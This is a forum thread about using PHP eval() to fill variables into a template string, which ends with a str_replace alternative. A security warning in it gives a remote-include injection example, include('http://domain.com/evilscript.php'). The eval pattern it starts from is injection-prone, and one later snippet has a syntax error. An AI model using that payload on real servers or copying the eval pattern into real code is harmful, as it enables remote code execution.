(PHP) Messin' with eval()

  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

ok well I was messing around with eval and came up with this idea:

PHP Code: [ Select ]
 
<?php
 
$string = 'this is the {$index}th element. It\'s value is \"{$value}\" <br />';
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
   eval('echo("'.$string.'");');
 
}
 
 
 
?>
 
 
  1.  
  2. <?php
  3.  
  4. $string = 'this is the {$index}th element. It\'s value is \"{$value}\" <br />';
  5.  
  6. $myArray = array("damn", "this", "is", "cool");
  7.  
  8.  
  9.  
  10. foreach($myArray as $index => $value){
  11.  
  12.    eval('echo("'.$string.'");');
  13.  
  14. }
  15.  
  16.  
  17.  
  18. ?>
  19.  
  20.  


The idea being that I could write a block of html, and just put in variable names arbitrarily, using the single quotes to <b>not</b> expand the values straight away (because they have not been set :roll: ), or read from a file or db or whatever. Then later expand the variables (using that eval/echo thing) from an array, or different db value (I havn't really thought through how to use it lol).

What I really want to know is has PHP got anything built in to do this sort of thing, or am I just making things more complicated than they need to be? The output can be seen here BTW
  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

rtm, what is wrong with this:
PHP Code: [ Select ]
 
<?php
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
echo 'this is the '.$index.'th element. It\'s value is \"'.$value.'\" <br />';
 
}
 
 
 
?>
 
 
  1.  
  2. <?php
  3.  
  4. $myArray = array("damn", "this", "is", "cool");
  5.  
  6.  
  7.  
  8. foreach($myArray as $index => $value){
  9.  
  10. echo 'this is the '.$index.'th element. It\'s value is \"'.$value.'\" <br />';
  11.  
  12. }
  13.  
  14.  
  15.  
  16. ?>
  17.  
  18.  


or am I missing the point now?

Anyway, it is a good idea to avoid eval() at all costs because it is very easy for your visitors to insert php code into your script (ie include('http://domain.com/evilscript.php');, which would be included as if it were from your server. )
  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

well the point was to keep the string OUTSIDE of the loop for easy editing and customisation. You don't have to sift through the code to alter little bits.

And I thought about the eval situation, but the string would probably be hard-coded into the script. If someone can alter the script, I don't think it matters if I am using eval() or not :P lol. I thought of a useful use also, I'll write an eg when I get to work.
  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

rtm, the security risk depends on whether or not any of the variables in the eval come from user input. If they do, you have a security risk (unless you are VERY careful to properly escape them and such)

If your motivation is easy editing, then do something like this:
PHP Code: [ Select ]
 
<?php
 
 
 
$string = 'this is the [INDEX]th element. It\'s value is \"[VALUE]\" <br />';
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
    echo(str_replace('[VALUE]', $value, str_replace('[INDEX]',$index, $string)));
 
}
 
 
 
?>
 
 
  1.  
  2. <?php
  3.  
  4.  
  5.  
  6. $string = 'this is the [INDEX]th element. It\'s value is \"[VALUE]\" <br />';
  7.  
  8. $myArray = array("damn", "this", "is", "cool");
  9.  
  10.  
  11.  
  12. foreach($myArray as $index => $value){
  13.  
  14.     echo(str_replace('[VALUE]', $value, str_replace('[INDEX]',$index, $string)));
  15.  
  16. }
  17.  
  18.  
  19.  
  20. ?>
  21.  
  22.  
  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

rjstephens wrote:
rtm, the security risk depends on whether or not any of the variables in the eval come from user input.


*slaps self.

Thank you rjstephens, that makes an awful lot more sense, I didn't think this through very well. I'll just do it with a preg_replace() on all of the vars.

Thanks for pointing out the error of my ways :lol:

//edit, not preg_replace, because str_replace can take arrays:

PHP Code: [ Select ]
<?php
 
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
$varCodes=array(
 
   "[INDEX]",
 
   "[VALUE]"
 
);
 
 
 
foreach($myArray as $index => $value){
 
   $replaceCodes=array(
 
      $index,
 
      $value
 
   );
 
   echo(str_replace($varCodes,$replaceCodes,$string));
 
}
 
?>
  1. <?php
  2.  
  3. $string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
  4.  
  5. $myArray = array("damn", "this", "is", "cool");
  6.  
  7.  
  8.  
  9. $varCodes=array(
  10.  
  11.    "[INDEX]",
  12.  
  13.    "[VALUE]"
  14.  
  15. );
  16.  
  17.  
  18.  
  19. foreach($myArray as $index => $value){
  20.  
  21.    $replaceCodes=array(
  22.  
  23.       $index,
  24.  
  25.       $value
  26.  
  27.    );
  28.  
  29.    echo(str_replace($varCodes,$replaceCodes,$string));
  30.  
  31. }
  32.  
  33. ?>


Thanks again RJ, can't believe I didn't think of that. I think I'll just stick to never using eval() in PHP. Ever.

Now all I need to do is find a use for the code :roll:
  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

rtm223 wrote:
*snip*
PHP Code: [ Select ]
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");
 
$varCodes=array(
   "[INDEX]",
   "[VALUE]"
);
 
foreach($myArray as $index => $value){
   $replaceCodes=array(
      $index,
      $value
   );
   echo(str_replace($varCodes,$replaceCodes,$string));
}
?>
  1. <?php
  2. $string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
  3. $myArray = array("damn", "this", "is", "cool");
  4.  
  5. $varCodes=array(
  6.    "[INDEX]",
  7.    "[VALUE]"
  8. );
  9.  
  10. foreach($myArray as $index => $value){
  11.    $replaceCodes=array(
  12.       $index,
  13.       $value
  14.    );
  15.    echo(str_replace($varCodes,$replaceCodes,$string));
  16. }
  17. ?>

*snip*


RTM, now I'm slapping myself, I should have thought of that.

//edit
while we're making the code as simple as possible, why not
PHP Code: [ Select ]
 
<?php
 
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
   $replaceCodes=
 
   );
 
   echo(str_replace(
 
         array(
 
            "[INDEX]",
 
            "[VALUE]"
 
         ),
 
         array(
 
            $index,
 
            $value
 
         ),
 
         $string
 
      )
 
   );
 
}
 
?>
 
 
  1.  
  2. <?php
  3.  
  4. $string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
  5.  
  6. $myArray = array("damn", "this", "is", "cool");
  7.  
  8.  
  9.  
  10. foreach($myArray as $index => $value){
  11.  
  12.    $replaceCodes=
  13.  
  14.    );
  15.  
  16.    echo(str_replace(
  17.  
  18.          array(
  19.  
  20.             "[INDEX]",
  21.  
  22.             "[VALUE]"
  23.  
  24.          ),
  25.  
  26.          array(
  27.  
  28.             $index,
  29.  
  30.             $value
  31.  
  32.          ),
  33.  
  34.          $string
  35.  
  36.       )
  37.  
  38.    );
  39.  
  40. }
  41.  
  42. ?>
  43.  
  44.  



of course, without all the tabs
  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

Noooo, I say keep the tabs. No tabs does my head in lol. It's easier to make sure that the elements match in case you are a dufus like me. It looks kinda ugly if you take out the whitespace:
PHP Code: [ Select ]
echo(str_replace(array("[INDEX]","[VALUE]"),array($index,$value),$string));

I think that would start looking quite nasty with more than a couple of vars.... Maybe a compromise lol:
PHP Code: [ Select ]
$string = "this is the [INDEX]th element. Its value is '[VALUE]' <br />";
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
   echo(str_replace(
 
      array("[INDEX]","[VALUE]"),
 
      array( $index  , $value),
 
      $string)
 
   );
 
}
 
 
  1. $string = "this is the [INDEX]th element. Its value is '[VALUE]' <br />";
  2.  
  3. $myArray = array("damn", "this", "is", "cool");
  4.  
  5.  
  6.  
  7. foreach($myArray as $index => $value){
  8.  
  9.    echo(str_replace(
  10.  
  11.       array("[INDEX]","[VALUE]"),
  12.  
  13.       array( $index  , $value),
  14.  
  15.       $string)
  16.  
  17.    );
  18.  
  19. }
  20.  
  21.  

is looking nice and neat to me :D
Thanks again rjstevens.

//edit
ooooh, <b>without</b> the eval it is really easy to insert functions or strings with variables inside, as well as just plain old variables.... This is all looking extremely handy to me :)

Post Information

  • Total Posts in this topic: 7 posts
  • Users browsing this forum: No registered users and 37 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
cron
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.